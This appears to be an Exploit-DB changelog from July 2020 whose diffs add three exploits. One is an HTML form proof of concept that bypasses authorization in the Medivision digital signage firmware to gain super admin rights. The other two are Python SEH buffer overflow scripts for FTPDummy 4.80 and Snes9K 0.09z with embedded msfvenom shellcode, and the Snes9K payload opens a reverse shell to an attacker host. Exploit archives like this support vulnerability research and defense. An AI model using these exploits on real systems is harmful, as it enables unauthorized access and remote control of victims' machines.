DB: 2020-07-24

3 changes to exploits/shellcodes

FTPDummy 4.80 - Local Buffer Overflow (SEH)
Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)

UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass

exploits/hardware/webapps/48684.txt

@@ -0,0 +1,51 @@
+# Title: UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass
+# Date: 2020-07-23
+# Author: LiquidWorm
+# Product web page: http://www.medivision.co.kr
+# CVE: N/A
+
+Vendor: UBICOD Co., Ltd. | MEDIVISION INC.
+Product web page: http://www.medivision.co.kr
+Affected version: Firmware 1.5.1 (2013.01.3)
+
+Summary: Medivision is a service that provides everything from DID operation to
+development of DID (Digital Information Display) optimized for hospital environment
+and production of professional contents, through DID product installation, image,
+video content planning, design work, and remote control. This is a one-stop solution
+that solves management at once.
+
+Desc: The application suffers from a privilege escalation vulnerability. Normal user
+can elevate his/her privileges by navigating to /html/user (via IDOR) page sending an
+HTTP GET request setting the parameter 'ft[grp]' to integer value '3' gaining super
+admin rights.
+
+Tested on: Apache/2.4.7 (Ubuntu)
+           PHP/5.5.9-1ubuntu4.22
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5575
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5575.php
+
+
+19.06.2020
+
+--
+
+
+<html>
+  <body>
+    <form action="http://10.0.39.2/query/user/itSet" method="POST">
+      <input type="hidden" name="aa[_id]" value="157" />
+      <input type="hidden" name="aa[pass]" value="123456" />
+      <input type="hidden" name="od[]" value="name" />
+      <input type="hidden" name="ft[grp]" value="3" />
+      <input type="hidden" name="ip" value="0" />
+      <input type="hidden" name="np" value="13" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/windows/local/48685.py

@@ -0,0 +1,80 @@
+# Exploit Title: FTPDummy 4.80 - Local Buffer Overflow (SEH)
+# Date: 2020-07-22
+# Author: Felipe Winsnes
+# Software Link: http://www.dummysoftware.com/ftpdummy.html
+# Version: 4.80
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Proof of Concept:
+# 1.- Run the python script, it will create the file "ftpdummypref3.dat".
+# 2.- Place the generated file into "C:\Program Files\FTPDummy!\".
+# 3.- Open the application.
+# 4.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
+# Payload size: 448 bytes
+
+buf =  b""
+buf += b"\x89\xe0\xd9\xc5\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x68\x68\x6e"
+buf += b"\x62\x53\x30\x53\x30\x67\x70\x35\x30\x6f\x79\x5a\x45"
+buf += b"\x34\x71\x4f\x30\x71\x74\x4e\x6b\x30\x50\x74\x70\x6c"
+buf += b"\x4b\x43\x62\x54\x4c\x4e\x6b\x56\x32\x67\x64\x4c\x4b"
+buf += b"\x32\x52\x36\x48\x74\x4f\x58\x37\x61\x5a\x35\x76\x30"
+buf += b"\x31\x69\x6f\x6c\x6c\x37\x4c\x35\x31\x31\x6c\x75\x52"
+buf += b"\x54\x6c\x57\x50\x39\x51\x48\x4f\x66\x6d\x56\x61\x7a"
+buf += b"\x67\x59\x72\x6c\x32\x52\x72\x63\x67\x4e\x6b\x62\x72"
+buf += b"\x32\x30\x4e\x6b\x73\x7a\x77\x4c\x6c\x4b\x52\x6c\x54"
+buf += b"\x51\x53\x48\x68\x63\x51\x58\x37\x71\x4b\x61\x72\x71"
+buf += b"\x4c\x4b\x32\x79\x61\x30\x47\x71\x5a\x73\x4c\x4b\x57"
+buf += b"\x39\x76\x78\x48\x63\x47\x4a\x67\x39\x6e\x6b\x50\x34"
+buf += b"\x6e\x6b\x43\x31\x4a\x76\x34\x71\x69\x6f\x6c\x6c\x49"
+buf += b"\x51\x6a\x6f\x54\x4d\x65\x51\x68\x47\x45\x68\x6b\x50"
+buf += b"\x63\x45\x6b\x46\x76\x63\x43\x4d\x6a\x58\x67\x4b\x43"
+buf += b"\x4d\x74\x64\x51\x65\x4a\x44\x42\x78\x6c\x4b\x76\x38"
+buf += b"\x56\x44\x53\x31\x6e\x33\x32\x46\x4c\x4b\x36\x6c\x72"
+buf += b"\x6b\x6c\x4b\x66\x38\x75\x4c\x53\x31\x4a\x73\x6e\x6b"
+buf += b"\x33\x34\x4c\x4b\x47\x71\x6e\x30\x4b\x39\x77\x34\x44"
+buf += b"\x64\x35\x74\x51\x4b\x63\x6b\x63\x51\x70\x59\x70\x5a"
+buf += b"\x76\x31\x69\x6f\x59\x70\x73\x6f\x53\x6f\x71\x4a\x4c"
+buf += b"\x4b\x46\x72\x38\x6b\x6e\x6d\x71\x4d\x50\x6a\x47\x71"
+buf += b"\x4e\x6d\x4f\x75\x4e\x52\x47\x70\x37\x70\x53\x30\x42"
+buf += b"\x70\x32\x48\x76\x51\x6e\x6b\x32\x4f\x4f\x77\x79\x6f"
+buf += b"\x5a\x75\x4f\x4b\x6b\x50\x47\x6d\x44\x6a\x57\x7a\x50"
+buf += b"\x68\x79\x36\x4e\x75\x6d\x6d\x6d\x4d\x6b\x4f\x49\x45"
+buf += b"\x57\x4c\x77\x76\x51\x6c\x74\x4a\x4b\x30\x49\x6b\x59"
+buf += b"\x70\x34\x35\x63\x35\x4d\x6b\x50\x47\x74\x53\x44\x32"
+buf += b"\x52\x4f\x31\x7a\x75\x50\x53\x63\x69\x6f\x38\x55\x42"
+buf += b"\x43\x61\x71\x72\x4c\x65\x33\x54\x6e\x61\x75\x70\x78"
+buf += b"\x50\x65\x73\x30\x41\x41"
+
+start = "\x41"* 8
+start += "\x0d\x0a\x31\x0d\x0a"
+ending = "\x0d\x0a"
+
+end = "170.1.1.0"
+end += "\x0d\x0a"
+end += "\x22"
+end += "C:\Archivos2de2programa\FTPDummy!\FTPDummy!2418101EXE"
+end += "\x22"
+
+nseh = "\x70\x08\x71\x06"
+seh = struct.pack("<I", 0x0044D078)
+
+buffer = start + "A" * 477 + nseh + seh + "A" * 5 + buf + "\xff" * 2000 + ending + end
+
+try:
+    f = open ("ftpdummypref3.dat", "w")
+    f.write(buffer)
+    f.close()
+    print "[+] The file has been created successfully!"
+
+except:
+    print "[!] There has been an error while creating the file."

exploits/windows/local/48686.py

@@ -0,0 +1,61 @@
+# Exploit Title: Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)
+# Date: 2020-07-20
+# Exploit Author: MasterVlad
+# Vendor Homepage: https://sourceforge.net/projects/snes9k/
+# Software Link: https://www.exploit-db.com/apps/ef5249b64ce34575c12970b334a08c17-snes9k009z.zip
+# Version: 0.09z
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 10 x64
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open Snes9K 0.09z
+# 4. Click on Netplay -> Connect to Server
+# 5. Paste the clipboard into the "Port Number" field
+# 6. Click on Connect and then on OK
+
+#!/usr/bin/python
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d" -f py
+
+buf =  ""
+buf += "\xd9\xc3\xbf\x7c\xdc\xed\x95\xd9\x74\x24\xf4\x58\x29"
+buf += "\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x04\xcf\x0f"
+buf += "\x60\x08\x07\x4d\x8b\xf0\xd8\x32\x05\x15\xe9\x72\x71"
+buf += "\x5e\x5a\x43\xf1\x32\x57\x28\x57\xa6\xec\x5c\x70\xc9"
+buf += "\x45\xea\xa6\xe4\x56\x47\x9a\x67\xd5\x9a\xcf\x47\xe4"
+buf += "\x54\x02\x86\x21\x88\xef\xda\xfa\xc6\x42\xca\x8f\x93"
+buf += "\x5e\x61\xc3\x32\xe7\x96\x94\x35\xc6\x09\xae\x6f\xc8"
+buf += "\xa8\x63\x04\x41\xb2\x60\x21\x1b\x49\x52\xdd\x9a\x9b"
+buf += "\xaa\x1e\x30\xe2\x02\xed\x48\x23\xa4\x0e\x3f\x5d\xd6"
+buf += "\xb3\x38\x9a\xa4\x6f\xcc\x38\x0e\xfb\x76\xe4\xae\x28"
+buf += "\xe0\x6f\xbc\x85\x66\x37\xa1\x18\xaa\x4c\xdd\x91\x4d"
+buf += "\x82\x57\xe1\x69\x06\x33\xb1\x10\x1f\x99\x14\x2c\x7f"
+buf += "\x42\xc8\x88\xf4\x6f\x1d\xa1\x57\xf8\xd2\x88\x67\xf8"
+buf += "\x7c\x9a\x14\xca\x23\x30\xb2\x66\xab\x9e\x45\x88\x86"
+buf += "\x67\xd9\x77\x29\x98\xf0\xb3\x7d\xc8\x6a\x15\xfe\x83"
+buf += "\x6a\x9a\x2b\x03\x3a\x34\x84\xe4\xea\xf4\x74\x8d\xe0"
+buf += "\xfa\xab\xad\x0b\xd1\xc3\x44\xf6\xb2\x2b\x30\x5c\xc3"
+buf += "\xc4\x43\x9c\xc5\xaf\xcd\x7a\xaf\xdf\x9b\xd5\x58\x79"
+buf += "\x86\xad\xf9\x86\x1c\xc8\x3a\x0c\x93\x2d\xf4\xe5\xde"
+buf += "\x3d\x61\x06\x95\x1f\x24\x19\x03\x37\xaa\x88\xc8\xc7"
+buf += "\xa5\xb0\x46\x90\xe2\x07\x9f\x74\x1f\x31\x09\x6a\xe2"
+buf += "\xa7\x72\x2e\x39\x14\x7c\xaf\xcc\x20\x5a\xbf\x08\xa8"
+buf += "\xe6\xeb\xc4\xff\xb0\x45\xa3\xa9\x72\x3f\x7d\x05\xdd"
+buf += "\xd7\xf8\x65\xde\xa1\x04\xa0\xa8\x4d\xb4\x1d\xed\x72"
+buf += "\x79\xca\xf9\x0b\x67\x6a\x05\xc6\x23\x9a\x4c\x4a\x05"
+buf += "\x33\x09\x1f\x17\x5e\xaa\xca\x54\x67\x29\xfe\x24\x9c"
+buf += "\x31\x8b\x21\xd8\xf5\x60\x58\x71\x90\x86\xcf\x72\xb1"
+
+exploit = "A"*420
+exploit += "\x74\x06\x75\x04"
+# 0x10015140 pop pop ret; SDL.dll
+exploit += "\x40\x51\x01\x10"
+exploit += "\x41"*(2000-428-len(buf))
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()

files_exploits.csv

@@ -11123,6 +11123,8 @@ id,file,description,date,author,type,platform,port
 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,
 48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows,
 48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
+48685,exploits/windows/local/48685.py,"FTPDummy 4.80 - Local Buffer Overflow (SEH)",2020-07-23,"Felipe Winsnes",local,windows,
+48686,exploits/windows/local/48686.py,"Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)",2020-07-23,MasterVlad,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42930,3 +42932,4 @@ id,file,description,date,author,type,platform,port
 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,
 48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
 48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,
+48684,exploits/hardware/webapps/48684.txt,"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass",2020-07-23,LiquidWorm,webapps,hardware,